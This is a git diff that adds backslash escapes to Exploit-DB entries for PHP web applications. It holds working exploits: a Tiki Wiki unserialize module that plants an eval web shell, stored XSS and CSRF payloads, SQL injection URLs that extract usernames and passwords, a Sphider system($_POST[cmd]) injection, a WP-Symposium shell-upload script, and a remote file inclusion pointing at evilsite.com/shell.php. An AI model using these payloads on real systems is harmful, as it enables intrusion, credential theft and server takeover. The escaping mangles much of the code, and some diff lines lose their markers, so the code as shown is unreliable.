-			print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On."
+			print_error \"Tiki Wiki path couldn\'t be disclosed. The php setting \'display_errors\' must be On.\"
 			return
 		else
 			tiki_path = $1
-			print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
+			print_good \"#{@peer} - Tiki Wiki path disclosure: #{tiki_path}\"
 		end
-		php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
+		php_payload = \"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\"
-		printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:"
+		printpages = \"O:29:\\\"Zend_Pdf_ElementFactory_Proxy\\\":1:\"
-		printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:"
+		printpages << \"{s:39:\\\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\\\";O:51:\\\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\\\":5:\"
-		printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:"
+		printpages << \"{s:12:\\\"%00*%00_docCount\\\";i:1;s:8:\\\"%00*%00_name\\\";s:3:\\\"foo\\\";s:13:\\\"%00*%00_directory\\\";O:47:\\\"Zend_Search_Lucene_Storage_Directory_Filesystem\\\":1:\"
-		printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}"
+		printpages << \"{s:11:\\\"%00*%00_dirPath\\\";s:#{tiki_path.length + @upload_php.length + 1}:\\\"#{tiki_path + @upload_php}%00\\\";}\"
-		printpages << "s:10:\"%00*%00_fields\";a:1:"
+		printpages << \"s:10:\\\"%00*%00_fields\\\";a:1:\"
-		printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:"
+		printpages << \"{i:0;O:34:\\\"Zend_Search_Lucene_Index_FieldInfo\\\":1:\"
-		printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
+		printpages << \"{s:4:\\\"name\\\";s:#{php_payload.length}:\\\"#{php_payload}\\\";}}\"
-		printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
+		printpages << \"s:9:\\\"%00*%00_files\\\";O:8:\\\"stdClass\\\":0:{}}}\"
-		print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+		print_status(\"#{@peer} - Exploiting the unserialize() to upload PHP code\")
 		res = send_request_cgi(
 		{
-			'uri' => "#{base}tiki-print_multi_pages.php",
+			\'uri\' => \"#{base}tiki-print_multi_pages.php\",
-			'method' => 'POST',
+			\'method\' => \'POST\',
-			'vars_post' => {
+			\'vars_post\' => {
-				'printpages' => printpages
+				\'printpages\' => printpages
 			}
 		})
 		if not res or res.code != 200
-			print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
+			print_error(\"#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.\")
 			return
 		end
-		print_status("#{@peer} - Executing the payload #{@upload_php}")
+		print_status(\"#{@peer} - Executing the payload #{@upload_php}\")
 		res = send_request_cgi(
 		{
-			'method' => 'GET',
+			\'method\' => \'GET\',
-			'uri'    => "#{base + @upload_php}",
+			\'uri\'    => \"#{base + @upload_php}\",
-			'headers' => {
+			\'headers\' => {
-				'Cmd' => Rex::Text.encode_base64(payload.encoded)
+				\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
 			}
 		})
 		if res
-			print_error("#{@peer} - Payload execution failed: #{res.code}")
+			print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
 			return
 		end
--- a/platforms/php/webapps/1974.txt
+++ b/platforms/php/webapps/1974.txt
@ -10,16 +10,16 @@ Vulnerable: smartsite cms  v1.0
 vulnerable code:
 ----------------------
 1-in comment.php :
-require($root . "include/inc_foot.php");
+require($root . \"include/inc_foot.php\");
 ---------------------------------------
 2-in /admin/test.php :
-require($root . "include/inc_adminfooter.php");
+require($root . \"include/inc_adminfooter.php\");
 ---------------------------------------
 3-in /admin/index.php :
-require($root . "admin/include/inc_adminfooter.php");
+require($root . \"admin/include/inc_adminfooter.php\");
 ---------------------------------------
 4-in /admin/include/inc_adminfoot.php:
-require($root . "include/inc_footer.php");
+require($root . \"include/inc_footer.php\");
 ---------------------------------------
 $root parameter File include
 -----------------------------------------------------------------------------------------------------------------------------------------
--- a/platforms/php/webapps/20579.py
+++ b/platforms/php/webapps/20579.py
@ -1,6 +1,6 @@
 #!/usr/bin/python
-'''
+\'\'\'
 # Exploit Title: T-dah Webmail Multiple Stored XSS issues.
 # Date: 17/08/2012
@ -26,11 +26,11 @@ Vulnerability Description
 Send an email to the victim with the payload in the e-mail body.
 XSS Will be triggered when the user clicks the link.
-XSS Payload: <a href=javascript:alert("XSS")>Click Me</a>
+XSS Payload: <a href=javascript:alert(\"XSS\")>Click Me</a>
 2. Stored XSS in email body (Previously Discovered by loneferret - http://www.exploit-db.com/exploits/20364/).
-XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
+XSS Payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
 Send an email to the victim with the payload in the email body, once the user opens the message XSS should be triggered.
@ -38,48 +38,48 @@ Send an email to the victim with the payload in the email body, once the user op
 3. Stored XSS contacts.
 Another stored XSS can be triggered when crating a new contact, almost every field in the form is vulnerable
-for example you can inject your payload <img src='1.jpg'onerror=javascript:alert("XSS")> in the "Name" field, Save contact, XSS Shoud be triggerd.
+for example you can inject your payload <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")> in the \"Name\" field, Save contact, XSS Shoud be triggerd.
 4. Stored XSS in Calendar
-Add a new event to calendar and in the message field insert the javascript payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
+Add a new event to calendar and in the message field insert the javascript payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
 Save the event, XSS Should be truggered.
-'''
+\'\'\'
 import smtplib
-print "###############################################"
+print \"###############################################\"
-print "#      T-dah Webmail 3.2.0 Stored XSS POC     #"
+print \"#      T-dah Webmail 3.2.0 Stored XSS POC     #\"
-print "#            Coded by: Shai rod               #"
+print \"#            Coded by: Shai rod               #\"
-print "#               @NightRang3r                  #"
+print \"#               @NightRang3r                  #\"
-print "#           http://exploit.co.il              #"
+print \"#           http://exploit.co.il              #\"
-print "#       For Educational Purposes Only!        #"
+print \"#       For Educational Purposes Only!        #\"
-print "###############################################\r\n"
+print \"###############################################\\r\\n\"
 # SETTINGS
-sender = "attacker@localhost"
+sender = \"attacker@localhost\"
 smtp_login = sender
-smtp_password = "qwe123"
+smtp_password = \"qwe123\"
-recipient = "victim@localhost"
+recipient = \"victim@localhost\"
-smtp_server  = "192.168.1.10"
+smtp_server  = \"192.168.1.10\"
 smtp_port = 25
-subject = "T-dah Webmail XSS POC"
+subject = \"T-dah Webmail XSS POC\"
 # SEND E-MAIL
-print "[*] Sending E-mail to " + recipient + "..."
+print \"[*] Sending E-mail to \" + recipient + \"...\"
-msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
+msg = (\"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\n\"
-       % (sender, ", ".join(recipient), subject) )
+       % (sender, \", \".join(recipient), subject) )
-msg += "Content-type: text/html\n\n"
+msg += \"Content-type: text/html\\n\\n\"
-msg += """<img src='1.jpg'onerror=javascript:alert("XSS-1")>\r\n"""
+msg += \"\"\"<img src=\'1.jpg\'onerror=javascript:alert(\"XSS-1\")>\\r\\n\"\"\"
-msg += """<a href=javascript:alert("XSS-2")>Click Me, Please...</a>\r\n"""
+msg += \"\"\"<a href=javascript:alert(\"XSS-2\")>Click Me, Please...</a>\\r\\n\"\"\"
 server = smtplib.SMTP(smtp_server, smtp_port)
 server.ehlo()
 server.starttls()
 server.login(smtp_login, smtp_password)
 server.sendmail(sender, recipient, msg)
 server.quit()
-print "[+] E-mail sent!"
+print \"[+] E-mail sent!\"
--- a/platforms/php/webapps/24108.txt
+++ b/platforms/php/webapps/24108.txt
@ -2,16 +2,16 @@
 # Author        : By onestree
 # Software Link : http://code.google.com/p/phpshop/downloads/list
 # tested        : windows 7 / ubuntu
-# Dork          : inurl:"tanyakan pada rumput yang bergoyang"
+# Dork          : inurl:\"tanyakan pada rumput yang bergoyang\"
 SQLi p0c:
 ==================
-http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
+http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11\'
 union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- 
-http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
+http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
--- a/platforms/php/webapps/28325.txt
+++ b/platforms/php/webapps/28325.txt
@ -1,8 +0,0 @@
 source: http://www.securityfocus.com/bid/19311/info
 OZJournal is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
 An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
 http://www.example.com/index.php?show=archives&y=2006&m=<script%20src=http://www.example.com/xss.js></script>
 http://www.example.com/index.php?show=archives&c=http://www.example.com/index.php?show=archives&c=<script%20src=http://www.example.com/xss.js></script>
--- a/platforms/php/webapps/3007.txt
+++ b/platforms/php/webapps/3007.txt
@ -4,7 +4,7 @@
 + Vendor ............: http://www.irokez.org/
 + Affected Software .: Irokez CMS <= 0.7.1
 + Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
-+ Description .......: "Irokez is a blogging based CMS"
+ Description .......: \"Irokez is a blogging based CMS\"
 + Class .............: Remote File Inclusion
 + Risk ..............: High (Remote File Execution)
 + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
@ -16,33 +16,33 @@
 +
 + Vulnerable Code:
 + scripts/gallery.scr.php, line(s) 11-12:
-+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 11: require_once \"{$GLOBALS[\'PTH\'][\'func\']}gallery.func.php\";
-+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ -> 12: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}gallery.class.php\";
 + scripts/sitemap.scr.php, line(s) 13:
-+ -> 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
+ -> 13: include_once $GLOBALS[\'PTH\'][\'classes\'] . \'menu.class.php\';
 + scripts/news.scr.php, line(s) 11:
-+ -> 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
+ -> 11: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'news.class.php\';
 + scripts/polls.scr.php, line(s) 03:
-+ -> 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
+ -> 03: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'poll.class.php\';
 + scripts/rss.scr.php, line(s) 04:
-+ -> 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}news.class.php\";
 + scripts/search.scr.php, line(s) 04:
-+ -> 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}content.class.php\";
 + scripts/xtextarea.scr.php, line(s) 03-04:
-+ -> 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
+ -> 03: $GLOBALS[\'spaw_root\'] = $spaw_root = $GLOBALS[\'PTH\'][\'spaw\'];
-+ -> 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
+ -> 04: require_once $GLOBALS[\'PTH\'][\'spaw\'] . \'spaw_control.class.php\';
 + functions/form.func.php, line(s) 03:
-+ -> 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
 + functions/general.func.php, line(s) 06:
-+ -> 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";  //TBL_Lang description
+ -> 06: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";  //TBL_Lang description
 + functions/groups.func.php, line(s) 03:
-+ -> 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}group.class.php\";
 + functions/js.func.php, line(s) 04:
-+ -> 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
 + functions/sections.func.php, line(s) 03:
-+ -> 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}section.class.php\";
 + functions/users.func.php, line(s) 03:
-+ -> 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}user.class.php\";
 +
 + Proof Of Concept:
 + http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
--- a/platforms/php/webapps/30449.txt
+++ b/platforms/php/webapps/30449.txt
@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a
 LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. 
-http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
+http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,\'-\',userPassword),4,5/**/FROM/**/tbl_ln_user/*
--- a/platforms/php/webapps/34189.txt
+++ b/platforms/php/webapps/34189.txt
@ -1,5 +1,5 @@
 # Exploit Title: Sphider 1.3.6 or later SQL Injection
-# Google Dork: intitle:"Sphider Admin Login"
+# Google Dork: intitle:\"Sphider Admin Login\"
 # Date: 1 July 2014
 # Exploit Author: Mike Manzotti
 # Vendor Homepage: http://www.sphider.eu/
@ -11,12 +11,12 @@ The web application is vulnerable to SQLi. Once a website has been indexed with
 Proof of Concept:
 Response: POST: /admin/admin.php
-per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
+per_page=10&filter=\'union+select+1,@@version+;#&start=1&site_id=1&f=21
 Response:
-<tr class="grey">
+<tr class=\"grey\">
-<td><a href="5.5.35-0+wheezy1">5.5.35-0+wheezy1</a></td>
+<td><a href=\"5.5.35-0+wheezy1\">5.5.35-0+wheezy1</a></td>
-<td width="8%">
+<td width=\"8%\">
 [cid:image001.jpg@01CFAA73.0B6B8330]
@ -24,13 +24,13 @@ Response:
 # Exploit Title: Sphider 1.3.6 or later PHP Injection
 Description:
-An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666.
+An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of \"conf.php file\". However during the installation the user is advised to change the permissions of \"conf.php\" file to chmod 666.
 Proof of Concept:
 Request: POST /admin/admin.php
 f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5
-"system($_POST[cmd])" has been injected.
+\"system($_POST[cmd])\" has been injected.
 Request: POST http://URL/sphider/settings/conf.php
 cmd=pwd
@ -49,7 +49,7 @@ Request: POST /admin/admin.php
 f=7&parent=&category=<script>alert(document.cookie)</script>
 Response
-<a href="admin.php?f=edit_cat&cat_id=1">
+<a href=\"admin.php?f=edit_cat&cat_id=1\">
 <script>alert(document.cookie)
 </script>
 </a>
@ -57,10 +57,10 @@ Response
 Reflected XSS:
 Request: POST /sphider/admin/admin.php
-f=index&adv=1&url="/><script>alert(document.cookie)</script>
+f=index&adv=1&url=\"/><script>alert(document.cookie)</script>
 Response:
-<a href="admin.php?f=edit_cat&cat_id=1">
+<a href=\"admin.php?f=edit_cat&cat_id=1\">
 <script>alert(document.cookie)
 </script>
 </a>
--- a/platforms/php/webapps/35336.txt
+++ b/platforms/php/webapps/35336.txt
@ -6,26 +6,26 @@ An attacker may leverage these issues to execute arbitrary script code in the br
 TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. 
-<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>  
+<script type=\"text/javascript\">function xss(){document.forms[\"zappa\"].submit();}</script>  
-<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">  
+<form name=\"zappa\" action=\"http://taskfreak/index.php\" method=\"POST\" id=\"zappa\">  
-    <input type="hidden" name="sProject" value="0" />  
+    <input type=\"hidden\" name=\"sProject\" value=\"0\" />  
-        <input type="hidden" name="id" value="" />  
+        <input type=\"hidden\" name=\"id\" value=\"\" />  
-        <input type="hidden" name="mode" value="save" />  
+        <input type=\"hidden\" name=\"mode\" value=\"save\" />  
-    <input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />  
+    <input type=\"hidden\" name=\"sContext\" value=\'%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20\' />  
-        <input type="hidden" name="sort" value='"><script>alert(1)</script>' />  
+        <input type=\"hidden\" name=\"sort\" value=\'\"><script>alert(1)</script>\' />  
-        <input type="hidden" name="dir" value='"><script>alert(2)</script>' />  
+        <input type=\"hidden\" name=\"dir\" value=\'\"><script>alert(2)</script>\' />  
-        <input type="hidden" name="show" value='"><script>alert(3)</script>' />  
+        <input type=\"hidden\" name=\"show\" value=\'\"><script>alert(3)</script>\' />  
 </form>  
-<a href="javascript: xss();" style="text-decoration:none">  
+<a href=\"javascript: xss();\" style=\"text-decoration:none\">  
-<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>  
+<b><font color=\"red\"><center><h3>Exploit!<h3></center></font></b></a>  
--- a/platforms/php/webapps/35338.txt
+++ b/platforms/php/webapps/35338.txt
@ -8,7 +8,7 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
 GET /taskfreak/rss.php HTTP/1.1  
-Referer: ">Waddup!  
+Referer: \">Waddup!  
 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
--- a/platforms/php/webapps/35543.txt
+++ b/platforms/php/webapps/35543.txt
@ -19,39 +19,39 @@
 #
 # --------------------------------------------------------------------
 #
-# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
+# The upload function located on \"/wp-symposium/server/file_upload_form.php \" is protected:
 #
-#   if ($_FILES["file"]["error"] > 0) {
+#   if ($_FILES[\"file\"][\"error\"] > 0) {
-#       echo "Error: " . $_FILES["file"]["error"] . "<br>";
+#       echo \"Error: \" . $_FILES[\"file\"][\"error\"] . \"<br>\";
 #   } else {
-#       $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
+#       $allowedExts = \',\'.get_option(WPS_OPTIONS_PREFIX.\'_image_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_doc_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_video_ext\');
-#       //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
+#       //echo \"Upload: \" . $_FILES[\"file\"][\"name\"] . \"<br>\";
-#       $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
+#       $ext = pathinfo($_FILES[\"file\"][\"name\"], PATHINFO_EXTENSION);
-#       //echo "Extension: " . $ext . "<br />";
+#       //echo \"Extension: \" . $ext . \"<br />\";
 #       if (strpos($allowedExts, $ext)) {
 #       $extAllowed = true;
 #       } else {
 #           $extAllowed = false;
 #       }
-#       //echo "Type: " . $_FILES["file"]["type"] . "<br>";
+#       //echo \"Type: \" . $_FILES[\"file\"][\"type\"] . \"<br>\";
-#       //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
+#       //echo \"Size: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB<br>\";
-#       //echo "Stored in: " . $_FILES["file"]["tmp_name"];
+#       //echo \"Stored in: \" . $_FILES[\"file\"][\"tmp_name\"];
 #
 #       if (!$extAllowed) {
-#           echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
+#           echo __(\'Sorry, file type not allowed.\', WPS_TEXT_DOMAIN);
 #       } else {
 #           // Copy file to tmp location
 #   ...
 #   ...
 #   ...
 #
-# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
+# BUTTTTT \"/wp-symposium/server/php/index.php\" is not protected and \"/wp-symposium/server/php/UploadHandler.php\" allow any extension
 #
-# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
+# The same vulnerable files are locate in \"/wp-symposium/mobile-files/server/php/\"
 #
 # ---------------------------------------------------------------------
 #
-# Dork google:  index of "wp-symposium"
+# Dork google:  index of \"wp-symposium\"
 #
 #
 # Tested on BackBox 3.x with python 2.6
@ -69,8 +69,8 @@ import os, os.path, mimetypes
 # Check url
 def checkurl(url):
-    if url[:8] != "https://" and url[:7] != "http://":
+    if url[:8] != \"https://\" and url[:7] != \"http://\":
-        print('[X] You must insert http:// or https:// procotol')
+        print(\'[X] You must insert http:// or https:// procotol\')
        sys.exit(1)
    else:
        return url
@ -78,62 +78,62 @@ def checkurl(url):
 # Check if file exists and has readable
 def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
-        print '[X] '+file+' file is missing or not readable'
+        print \'[X] \'+file+\' file is missing or not readable\'
        sys.exit(1)
    else:
        return file
-# Get file's mimetype
+# Get file\'s mimetype
 def get_content_type(filename):
-    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+    return mimetypes.guess_type(filename)[0] or \'application/octet-stream\'
 def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
-    return ''.join(random.choice(chars) for _ in range(size))
+    return \'\'.join(random.choice(chars) for _ in range(size))
 # Create multipart header
 def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
   getfields = dict()
-   getfields['uploader_uid'] = '1'
+   getfields[\'uploader_uid\'] = \'1\'
-   getfields['uploader_dir'] = './'+randDirName
+   getfields[\'uploader_dir\'] = \'./\'+randDirName
-   getfields['uploader_url'] = url_symposium_upload
+   getfields[\'uploader_url\'] = url_symposium_upload
   payloadcontent = open(payloadname).read()
-   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
+   LIMIT = \'----------lImIt_of_THE_fIle_eW_$\'
-   CRLF = '\r\n'
+   CRLF = \'\\r\\n\'
   L = []
   for (key, value) in getfields.items():
-      L.append('--' + LIMIT)
+      L.append(\'--\' + LIMIT)
-      L.append('Content-Disposition: form-data; name="%s"' % key)
+      L.append(\'Content-Disposition: form-data; name=\"%s\"\' % key)
-      L.append('')
+      L.append(\'\')
      L.append(value)
-   L.append('--' + LIMIT)
+   L.append(\'--\' + LIMIT)
-   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
+   L.append(\'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\' % (\'files[]\', randShellName+\".php\"))
-   L.append('Content-Type: %s' % get_content_type(payloadname))
+   L.append(\'Content-Type: %s\' % get_content_type(payloadname))
-   L.append('')
+   L.append(\'\')
   L.append(payloadcontent)
-   L.append('--' + LIMIT + '--')
+   L.append(\'--\' + LIMIT + \'--\')
-   L.append('')
+   L.append(\'\')
   body = CRLF.join(L)
   return body
-banner = """
+banner = \"\"\"
  ___ ___               __
 |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
- |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
+ |. / \\  |_____|__| |_____|   __|__| |_____|_____|_____|
 |:      |                |__|
 |::.|:. |
- `--- ---'
+ `--- ---\'
  ___ ___ _______        _______                                  __
 |   Y   |   _   |______|   _   .--.--.--------.-----.-----.-----|__.--.--.--------.
 |.  |   |.  1   |______|   1___|  |  |        |  _  |  _  |__ --|  |  |  |        |
- |. / \  |.  ____|      |____   |___  |__|__|__|   __|_____|_____|__|_____|__|__|__|
+ |. / \\  |.  ____|      |____   |___  |__|__|__|   __|_____|_____|__|_____|__|__|__|
 |:      |:  |          |:  1   |_____|        |__|
 |::.|:. |::.|          |::.. . |
- `--- ---`---'          `-------'
+ `--- ---`---\'          `-------\'
                                                              Wp-Symposium
                                                      Sh311 Upl04d Vuln3r4b1l1ty
                                                                v14.11
@ -151,17 +151,17 @@ banner = """
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
-"""
+\"\"\"
-commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
+commandList = optparse.OptionParser(\'usage: %prog -t URL -f FILENAME.PHP [--timeout sec]\')
-commandList.add_option('-t', '--target', action="store",
+commandList.add_option(\'-t\', \'--target\', action=\"store\",
-                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
                  )
-commandList.add_option('-f', '--file', action="store",
+commandList.add_option(\'-f\', \'--file\', action=\"store\",
-                  help="Insert file name, ex: shell.php",
+                  help=\"Insert file name, ex: shell.php\",
                  )
-commandList.add_option('--timeout', action="store", default=10, type="int",
+commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
-                  help="[Timeout Value] - Default 10",
+                  help=\"[Timeout Value] - Default 10\",
                  )
 options, remainder = commandList.parse_args()
@ -180,31 +180,31 @@ print(banner)
 socket.setdefaulttimeout(timeout)
-url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
+url_symposium_upload = host+\'/wp-content/plugins/wp-symposium/server/php/\'
-content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
+content_type = \'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$\'
 randDirName = id_generator()
 randShellName = id_generator()
 bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
-headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
+headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\',
-           'content-type': content_type,
+           \'content-type\': content_type,
-           'content-length': str(len(bodyupload)) }
+           \'content-length\': str(len(bodyupload)) }
 try:
-    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
+    req = urllib2.Request(url_symposium_upload+\'index.php\', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()
-    if "error" in read or read == "0" or read == "":
+    if \"error\" in read or read == \"0\" or read == \"\":
-       print("[X] Upload Failed :(")
+       print(\"[X] Upload Failed :(\")
    else:
-       print("[!] Shell Uploaded")
+       print(\"[!] Shell Uploaded\")
-       print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
+       print(\"[!] Location: \"+url_symposium_upload+randDirName+randShellName+\".php\\n\")
 except urllib2.HTTPError as e:
-    print("[X] "+str(e))
+    print(\"[X] \"+str(e))
 except urllib2.URLError as e:
-    print("[X] Connection Error: "+str(e))
+    print(\"[X] Connection Error: \"+str(e))
--- a/platforms/php/webapps/36490.py
+++ b/platforms/php/webapps/36490.py
@ -10,14 +10,14 @@
 #
 # --------------------------------------------------------------------
 #
-# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
+# The vulnerable function is located on \"wpmarketplace/libs/cart.php\" file:
 #
 # function ajaxinit(){
-#     if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
+#     if(isset($_POST[\'action\']) && $_POST[\'action\']==\'wpmp_pp_ajax_call\'){
-#	    if(function_exists($_POST['execute']))
+#	    if(function_exists($_POST[\'execute\']))
-#		    call_user_func($_POST['execute'],$_POST);
